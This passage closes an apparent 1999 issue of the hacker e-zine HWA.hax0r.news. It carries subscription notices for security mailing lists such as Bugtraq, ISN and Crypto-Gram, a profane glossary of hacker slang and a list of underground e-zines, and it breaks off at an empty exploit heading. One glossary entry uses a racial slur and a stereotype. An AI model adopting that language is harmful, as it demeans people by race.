to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe, visit http://www.counterpane.com/unsubform.html.� Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.� He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest�� Sun� 14 Feb, 1999�� Volume 11 : Issue 09 �� ISSN� 1004-042X �� Editor: Jim Thomas (cudigest@sun.soci.niu.edu) �� News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) �� Archivist: Brendan Kehoe �� Poof Reader:�� Etaion Shrdlu, Jr. �� Shadow-Archivists: Dan Carosone / Paul Southworth �� Ralph Sims / Jyrki Kuoppala �� Ian Dickinson �� Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? Comments: To: InfoSec News To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs. Win2k Security Advice Mailing List (new added Nov 30th) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To subscribe: send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body to listserv@listserv.ntsecurity.net Welcome to Win2K Security Advice! Thank you for subscribing. If you have any questions or comments about the list please feel free to contact the list moderator, Steve Manzuik, at steve@win2ksecadvice.net. To see what you've missed recently on the list, or to research an item of interest, be sure to visit the Web-based archives located at: http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec ============== NTSecurity.net brings the security community a brand new (Oct 99) and much-requested Windows security mailing list. This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open discussion of Windows-related security issues. With a firm and unwavering commitment towards timely full disclosure, this new resource promises to become a great forum for open discussion regarding security-related bugs, vulnerabilities, potential exploits, virus, worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community and we openly invite all security minded individuals, be they white hat, gray hat, or black hat, to join the new mailing list. While Win2KSecAdvice was named in the spirit of Microsoft's impending product line name change, and meant to reflect the list's security focus both now and in the long run, it is by no means limited to security topics centered around Windows 2000. Any security issues that pertain to Windows-based networking are relevant for discussion, including all Windows operating systems, MS Office, MS BackOffice, and all related third party applications and hardware. The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to a security risk, it's relevant to the list. The list archives are available on the Web at http://www.ntsecurity.net, which include a List Charter and FAQ, as well as Web-based searchable list archives for your research endeavors. SAVE THIS INFO FOR YOUR REFERENCE: To post to the list simply send your email to win2ksecadvice@listserv.ntsecurity.net To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to listserv@listserv.ntsecurity.net Regards, Steve Manzuik, List Moderator Win2K Security Advice steve@win2ksecadvice.net @HWA A.9 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA A.10 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ ___ ___ _____ _ ___ | | | \ \ / / \ | ___/ \ / _ \ | |_| |\ \ /\ / / _ \ | |_ / _ \| | | | | _ | \ V V / ___ \ _| _/ ___ \ |_| | |_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. A.11 NEW Underground E-Zines ~~~~~~~~~~~~~~~~~~~~~~~ New releases: SET Saqueadores Edici�n T�cnica: http://www.set-ezine.org f41th magazine issue 12 is out.: http://f41th.com/index2.html Digital Defiance 5 (!) is out..: http://www.hackers.cx New zines on the scene: InET.......................... http://www.warpedreality.com/inet Hack In the Box............... http://www.thelimit.net/hitb Quadcon....................... http://landfill.bit-net.com/~quadcon/quadcon-3.txt DataZine...................... http://www.tdcore.com Napalm........................ http://napalm.firest0rm.org/ Digital Defiance.............. http://www.hackers.cx @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- � 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65] Crashing your MSIE 5 browser: